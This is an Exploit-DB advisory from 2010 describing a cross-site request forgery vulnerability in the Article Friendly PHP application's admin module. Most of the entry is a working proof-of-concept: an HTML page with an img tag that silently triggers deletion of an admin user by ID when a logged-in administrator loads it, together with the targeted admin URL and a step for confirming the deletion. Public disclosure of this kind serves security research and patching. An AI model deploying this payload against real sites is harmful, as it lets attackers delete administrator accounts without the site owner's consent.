Article Friendly - Cross-Site Request Forgery

EDB-ID:

11559

CVE:

N/A

EDB Verified:

Author:

pratul agrawal

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-02-24

Vulnerable App:

                     =======================================================================
  
                                         Article friendly CSRF Vulnerability

                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal

  
  
  # Vulnerability found in- Admin module
  
  # email         Pratulag@yahoo.com
  
  # company       aksitservices
  
  # Credit by     Pratul Agrawal
 
  # Site p4ge     http://www.articlefriendly.com/
 
  # Plateform     php
 
  
  
  # Proof of concept   #

  Targeted URL:  http://server/admin/index.php?filename=adminlogin
 

  Script to delete the Admin user through Cross Site request forgery
 
             .  ..................................................................................................................
 
                        <html>
 
                          <body>
 
      <img src=http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
 
                          </body>
 
                        </html>
 
 
             .  ..................................................................................................................
 
 
 
  After execution refresh the page and u can see that user having giving ID  get deleted automatically.


#If you have any questions, comments, or concerns, feel free to contact me.

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services